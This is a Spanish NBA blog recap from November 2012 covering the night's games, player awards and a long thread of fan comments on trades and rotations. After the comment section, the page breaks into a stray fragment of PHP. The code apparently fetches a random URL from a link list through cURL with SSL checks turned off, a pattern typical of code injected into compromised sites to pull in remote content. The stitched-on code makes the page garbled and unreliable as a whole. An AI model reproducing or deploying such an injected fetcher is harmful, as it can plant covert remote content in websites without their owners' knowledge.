La Crónica: ¡Knicks mandando!

06 de November de 2012 por TheDeerHunter

No veíamos un comienzo 3-0 de los Knicks desde el siglo pasado, nada menos. Anoche bombardearon Philadelphia en una nueva exhibición desde la larga distancia (13 de 32 de 3p) y 7 hombres estuvieron en dobles figuras, Rasheed y Prigioni entre ellos. ¡Viva el Rock&Roll! (110-88).

Menos noticioso es que los Spurs comiencen como un tiro. Mantuvieron su inmaculada marca y pusieron el 4-0 contra Indiana dejándoles por debajo de 80 puntos en una actuación particularmente mediocre de Roy Hibbert. Los dos mejores hombres tejanos salieron desde el banco: Gary Neal acabó con 17 puntos y Blair nos dejó un partido completísimo cuando apenas hace una semana se veía casi desahuciado del equipo (79-101).

Los Wolves molan. Ya casi no necesitan ni a Love ni a Ricky para molar. Anoche levantaron 22 puntos contra Brooklyn. Kirilenko y Pekovic hacen una excelente pareja y anoche se unieron a la fiesta Cunningham, Shved y Budinger. Se ponen en positivo (107-96).

En Memphis, brutal actuación de la pareja Zach&Marc, con el valor añadido de hacerlo contra los bichos interiores de Utah. Marc acabó rozando el triple doble y dejó a Al Jefferson en 11 puntos. Zach agarró él sólo casi la mitad de rebotes que todos sus rivales juntos. Los Jazz, como el año pasado, empiezan flojos fuera de casa (94-103).

La gran sorpresa nos la brindaron los Cavs ante Clippers en el Staples (108-101). Imparable la dupla Irving-Waiters (11 de 19 en 3p los angelitos) con Varejao y Zeller sólidos en la pintura. A destacar las 25 pérdidas de los locales.

Terminando: Mayo y sus Mavs destrozaron a Portland (91-114); Miami hizo lo propio con los Suns (99-124), y Cousins lideró a los suyos para estrenar su casillero de victorias contra Warriors (92-94).

PREMIOS

MVP: Jugadores totales. Marc Gasol consiguió 22 puntos, 8 rebotes y 8 asistencias mientras que Andrei Kirilenko sumó 16 puntos, 10 rebotes y 4 tapones. Ambos lideraron a sus equipos a la victoria.

Rookie: Explotó Dion Waiters. Tras un par de partidos dubitativos el jugador de los Cavs se fue a los 28 puntos con un porcentaje cercano al 60% de acierto. Su compañero Tyler Zeller acabó con 15 puntos y 7 rebotes.

Sorpresa: Rápido se puso el partido de cara a los Spurs y hubo minutos para los menos habituales. DeJuan Blair los aprovechó con 14 puntos, 11 rebotes y 4 asistencias.

Decepción: Los Pacers  llegaron a los 20 puntos cuando faltaban 7 minutos para llegar al descanso. Personalizamos la debacle en Roy Hibbert que se quedó en 2 míseros puntos.

Esfuerzo en vano: Buen partido de Blake Griffin y Chris Paul pero derrota de los Clippers. El primero consiguió 20 puntos, 6 rebotes, 5 asistencias y 3 tapones mientras que el base se fue a los 17 puntos, 5 rebotes y 9 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. M dice:
    #1

    Juer con Prigioni…no confiaba nada en él, espero que siga así. Kirilenko es un jugador total que además creo que ha mejorado mucho desde sus inicios, hace de todo, y todo bastante bien.

      Citar

  2. GreenPride dice:
    #2

    Bueno pues los Knicks siguen arrasando, ¿Quien dijo que sobraba Amare? Con estos resultados se hace aún más patente que no le necesitan y que sus lagunas de intensidad coartan al equipo. Un traspaso podría ser muy beneficioso para los Knicks y por ahí apuntaban uno por Pau que podría ser muy beneficioso incluso quizás para ambos equipos (bueno para los Lakers quizás no tanto).
    Sorprendentes para mí los Wolves sin Ricky y sobre todo sin Love. Este equipo es joven y con ganas y apunta a ser uno de los animadores de la temporada.
    En Texas nada cambia con los Spurs. El mismo equipo sólido y competitivo que optará a llevarse el mejor record de la temporada.
    Bien los Grizzlies, con Marc&Zach a ese nivel pueden dar guerra. Sin ellos no son equipo ni de playoffs.
    Parece que Cuban no estaba tan loco cuando dijo que Mayo podia ser una estrella fuera de Memphis. Ha empezado a tope y los Mavs sorprendentemente bien sin Dirk. Muy buen debut de Kaman para los de Dallas.
    Sin problemas para los Heat y gran tropezón para los Clippers. Dejarse ganar en casa por los Cavs no es de recibo por mucho que Waiters y Irving las metan todas. Atención a los jóvenes Cavs que parecen dispuestos a dar guerra también este año.

      Citar

  3. lost dice:
    #3

    No estaría de más poner a Rasheed en sorpresa. 10 puntos después de estar 2 años retirado no está mal xd

      Citar

  4. Chipi dice:
    #4

    Digno de mención el 1 de 9 del señor Evans. Y no me resisto a hacer el chiste de que O.J. le ha venido a Dallas como agua de Mayo, jojojojo

    Vale, ya me voy.

      Citar

  5. Esteban dice:
    #5

    mucho hablar de harden en su nuevo rol y nos olvidamos de oj mayo, no esta a la altura del barba, pero superara los 20ppp y en el reposan las pocas chances de los mavs

    sin dirk, quien vuelve a decir presente es cris kaman con otros 16 puntos, sumados a el extraordionario rendimiento de collison, altamente por ensima de lo esperado, y la ayuda de jugadores q para mi estaban muertos como brendan wright y vince carter

    los mavs no tienen como para ilusionarse con un titulo, aunque veo un trade pronto por jose manuel calderon y quiza, hasta sumen de turkoglu si llega a romper su contrato en un tiempo con el magic

    un par de HOMBRES al lado no le vendria mal a dirk

      Citar

  6. Esteban dice:
    #6

    quien lo diria, pero los cavs le estan llevando todo, a mi criterio desarcertadas desciones de thompson primero y ahora de waiters

    pero thompson bien o mal demustranque tiene un futuro en esta liga, y waiters se estapa con la mejor actuaciones rookie hasta el momento,

    eso es ojo clinico, superior a la media

      Citar

  7. Esteban dice:
    #7

    y ahora me toca hablar de los knicks, una victoria queda chica al lado de como se consigue

    hace cuanto no vemos a los knicks sacar de la cancha a un rival de PO, supuestamente como los 76ers???

    fue baie, y demostraron su profundidad desde la banca

    un equipo solido, serio y con una mete, mucho cuidado con ellos, cuando vuelva camby y shumpert, seran aun mas peligrosos

    dios quiera q amare no arruine este equipo

    en cuanto los q hablan de un trade de amare, les comento q es imposible, 3 años por 20 millones por año, SIN SEGURO, nadie quiso asegurar esas rodillas, estilo yao ming, y losmknicks corrieron el riesgo
    la unica opcion es que vuelva de modo estelar y equipos como houston con mucho espacio asuman el riesgo, a ellos les vendria bien un 4 como amare, aunque no a ese precio

      Citar

  8. simon dice:
    #8

    No le demos vueltas Amare es hoy por hoy incolocable, se lo van a comer los Knics con patatas al menos hasta q sea expiring. Suele pasar siempre en las prikeras jornadas pero como mola la liga ahora mismo, parece q muchos equipos pueden dar guerra.

      Citar

  9. GreenPride dice:
    #9

    Cierto lo que decis a dia de hoy parece muy dificil que los Knicks puedan colocar a Amare así que lo mejor que podrían hacer sería intentar sacar lo máximo de él. Si consiguieran involucrarle podía quedarles un equipo para dar guerra, aunque yo sigo diciendo que no les veo más alla del 4º puesto del Este. Veremos como siguen las cosas dentro de un par de semanas porque en las primeras jornadas siempre hay sorpresas que luego no se confirman a lo largo de la temporada

      Citar

  10. HisRoyalAirness dice:
    #10

    Por favor, dejad de decir ya lo de Amar’e por Pau. Cómo se van a tragar eso los Lakers???

    Y está bien hablar de los Wolves pero no os olvidéis de Adelman!! Es que lo que hace este tipo con sus equipos es increíble. La gestión de minutos ayer en la segunda parte fue brillante, dirigiendo en TODO momento las jugadas desde el lateral que debían hacer los jugadores y quién debía jugarse cada posesión. Dio la batuta al jugador adecuado en cada momento sin hacer distinciones: AK-47 (que está increíble, no me esperaba este nivel), Pekovic, incluso Shved. Hay un parcial de 14-0 que es para enseñar en las escuelas de basket. Y los Wolves también son equipo nuevo y sin sus 2 estrellas, no vale esa excusa para Brooklyn.
    Me está sorprendiendo también gratamente cómo está llevando “El Brujo” Adelman a Brandon Roy y cómo está asumiendo éste su nuevo rol.
    Estos Wolves pintan a equipo “mosca cojonera” de primera ronda (con Ricky y Love, obviamente).

    Marc enorme, por cierto, en defensa y en ataque intratable. Y en los tiros libres!

      Citar

  11. Ruxixón dice:
    #11

    Aquí servidor se comió el “Warriors @ Kings” con ganas de ver equipos no tan habituales en mi menú diario.Decir que los Kings molan pero les falta un hervor,por poco no echaron a perder un partido que tenían en la mano,ahí se nota qué tipo de jugadores militan en sus filas.10 arriba y cuando debes dormir el partido tirarse unas mandarinas cuando sólo han corrido 6-8 segundos de posesión.Ojo,hay potencial,pero no sé hasta que punto se puede confiar en dejarles madurar lentamente como grupo hasta que se les pele el culo y sean unos tios competitivos al 100%.Cousins sigue en la línea que lo confirma como un fuera de clase y Tyreke…De Keith Smart no puedo opinar por un partido pero se le ve un tio que tiene una conexión muy buena con los jugadores,no sé Sancho que es más habitual de Sacramento qué puede decir al respecto.

    Los Warriors tienen buena pinta,los veo muy versátiles y a la vez con un punto de equilibrio bastante interesante entre lo que tienen por dentro y lo que tienen por fuera,con el pegamento Barnes en el puesto de SF.Aún están acoplando piezas pero pueden dar guerra,eso sí,el partido de Sacramento me gustó mucho más.Creo que les pesa mucho el pésimo inicio de temporada de Curry y en buena parte dependerá de que mejore.Un 32% en tiros de campo y sólo +1.5 en el diferencial asistencias/pérdidas es un bagaje muy pobre.

      Citar

  12. HisRoyalAirness dice:
    #12

    Ruxixón:
    Aquí servidor se comió el “Warriors @ Kings” con ganas de ver equipos no tan habituales en mi menú diario.Decir que los Kings molan pero les falta un hervor,por poco no echaron a perder un partido que tenían en la mano,ahí se nota qué tipo de jugadores militan en sus filas.10 arriba y cuando debes dormir el partido tirarse unas mandarinas cuando sólo han corrido 6-8 segundos de posesión.Ojo,hay potencial,pero no sé hasta que punto se puede confiar en dejarles madurar lentamente como grupo hasta que se les pele el culo y sean unos tios competitivos al 100%.Cousins sigue en la línea que lo confirma como un fuera de clase y Tyreke…De Keith Smart no puedo opinar por un partido pero se le ve un tio que tiene una conexión muy buena con los jugadores,no sé Sancho que es más habitual de Sacramento qué puede decir al respecto.

    Los Warriors tienen buena pinta,los veo muy versátiles y a la vez con un punto de equilibrio bastante interesante entre lo que tienen por dentro y lo que tienen por fuera,con el pegamento Barnes en el puesto de SF.Aún están acoplando piezas pero pueden dar guerra,eso sí,el partido de Sacramento me gustó mucho más.Creo que les pesa mucho el pésimo inicio de temporada de Curry y en buena parte dependerá de que mejore.Un 32% en tiros de campo y sólo +1.5 en el diferencial asistencias/pérdidas es un bagaje muy pobre.

    Jojojo menudos huevos verte ese partido. Yo vi 2 posesiones en un descanso de Memphis y casi me sangran los ojos. Menuda pachanga

      Citar

  13. Esteban dice:
    #13

    En los nets muchas cosas positivas y varias negativas

    Las positivas:
    Tremendos sextos hombres watos y brooks, anotando a placer, era de esperar
    Bogans manteniendo sensaciones, buen defensor y un tiro abierto estable
    Deron y su magia, es el unico armador de la liga q puede hacerle sombra a cp3
    Increiblemente productivo blatche, lejos de las luces de estrella y de contrato millonario, puede aportar y mucho, sobretodo en atque, ha encontrado su lugar en la nba
    Evans rindiendo lo q se espera
    Teletovic, pidiendo pista, dos minutos le alcanzaron para gatillar un triplazo y volcar un balon

    Lo negativo:
    Jojo no termina de ewncontrar su ugar, los ataques no pasan por el y no se conforma con ser un tirador, por lo q busca soluciones individuales mas q dudosas, hasta el momento muy flojo lo suyo
    Humpries no termina de encontrar su lugar, en ataque se lo nota lejano al nivel de sus compañeros y no rebotea como era de esperar, a este ritmo puede que teletovic termine de titular
    Lopez, mi apuesta, termina sin cerrar, recibe menos bolas de las q deberia y tuvo grandes problemas con pekovic, debe ser mas constante
    Everyt jhonson, mi candidado a entrenador del aÑo, es pronto, pero tiene material para cerrar mejor el juego, adelman lo bailo, necesita mas jugadas para lopez y deron, sobre ellos dos debe girar el ataque de los nets y no es asi, permite que jojo decida mas de lo aconsejable, mientras q no le da minutos por el momento a teletovic, y deja demasiado tiempo en cancha a humpries

    Solo van dos juegos mas la pretemporada y es cierto q falto wallace, pero unos wolves sin love de local, son un rival para golear con el equipo q tienen los nets

      Citar

  14. Esteban dice:
    #14

    Otro q puede tener alguna q otra preocupacion son los clippers, les faltan billups y hill los q los puede hacer mejores, pero hay algunos puntos oscuros

    Odom, madre q te pasa chaval? Aun desanimado y desmotivado creia q podia dar algo, pero de poco parece q terminara la historia como en los mavs, lo peor es que es clave en este equipo, un rendimiento aceptable de su parte lhace a los clippers superpoderosos, pero un rendimiento asi, los deja muy flojos en su juego interior
    La incapacidad de progreso de griffin, mas q un karl malone, terminara siendo un amare, gran volador y terminador de jugadas pero poco mas, lejos de ser dominante, muy lejos

    Cp3, jamal, bledsoe, butler, green y barnes responden, y bien, pero el problema pasa por el juego interior

      Citar

  15. MagicJohnson32 dice:
    #15

    Es verdad, Esteban. Incluso diría que se echa en falta a Reggie Evans y Kenyon Martin. Eso sí, la rotación del 1 al 3 es tremenda, si Billups y Hill vuelven bien hay mucho nivel ahí.

      Citar

  16. gabriel dice:
    #16

    pues Kenyon estaba poco menos que pidiendo por favor que alguna franquicia le hiciera caso después de rechazar este verano a varios aspirantes al anillo que le ofrecían el mínimo, veremos donde acaba porque es un jugador que con todas las contras extradeportivas que pueda tener siempre es útil para cualquier equipo si esta implicado

      Citar

  17. Sancho88 dice:
    #17

    Ya fuimos dos Ruxixon, yo me lo he visto esta tarde. Bueno, fue un tostón en toda regla. Como dices Ruxixon, los Kings a punto estuvieron de tirar por la borda un partido que tenían dominado. Hasta dos clutchs desperdiciaron los Warriors para culminar la remontada. Evans lamentable en su selección de tiro, casi pierden por él, pero Brooks metió tiros clave. Smart está sacando petroleo de estos chavales tan jóvenes y descerebrados en su mayoría. Han mejorado este año bastante la defensa, cerrando mucho mejor el rebote defensivo, aunque en ataque les falta absolutamente todo. Anotan por la inspiración de Thornton y por la calidad de Cousins. En fin, les puse en 35 victorias, pero me parece que me equivoqué por unas cuantas, jejej. Los Warriors muy deficientes. Horchata en vez de sangre. Barnes tiene muy buena pinta, y Thomas Robinson en los Kings igual. A ver cuándo le dan más minutos. Es un crack!!

      Citar

  18. nba dice:
    #18

    Que se puede hacer con Derrick Williams, si ahora que no estan ni Beasley ni Johnson, no es capaz de reafirmar su presencia hasta la vuelta de Love, me da a mi que lo intentaran traspasar

      Citar

  19. Esteban dice:
    #19

    Williams nunca me gusto, tiene fisico para ser un ala pivote dominante a nivel fiba, pero es demasiado chico para ala pivote nba y demasiado lento para alero nba, no lo veo mas q un sexto hombre estilo el young de los 76ers, de menos nivel incluso

    Magic, se extrañan evans y martin por el nivel de odom, si este puede acercarse mas a un nivel aceptable, no extrañaran a nadie, hay q ver si odom se recupera, si no lo hace seguramente pactaran un corte y se abre una puerta para el regreso de martin

    Hablando de jugadores sin contrato, martin es uno, quien mas queda? Los rockets estan 10 millones por debajo del tope y necesitan ayuda, a quien pueden echar mano?

      Citar

  20. gabriel dice:
    #20

    Fisher, Delonte West, Josh Howard, Curry, Andersen, el citado Martin y poco mas que merezca la pena ¿no?

      Citar

  21. Esteban dice:
    #21

    mmmmm west y martin, bien podrian ayudar a los rockets en su afan de PO,

    howard hizo una gran temporada pasada, para lo que se podia esperar de el, es raro verlo sin equipo, LOS MAVS estan necesitanod un alero de racambio de marion, podria caerles bien

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>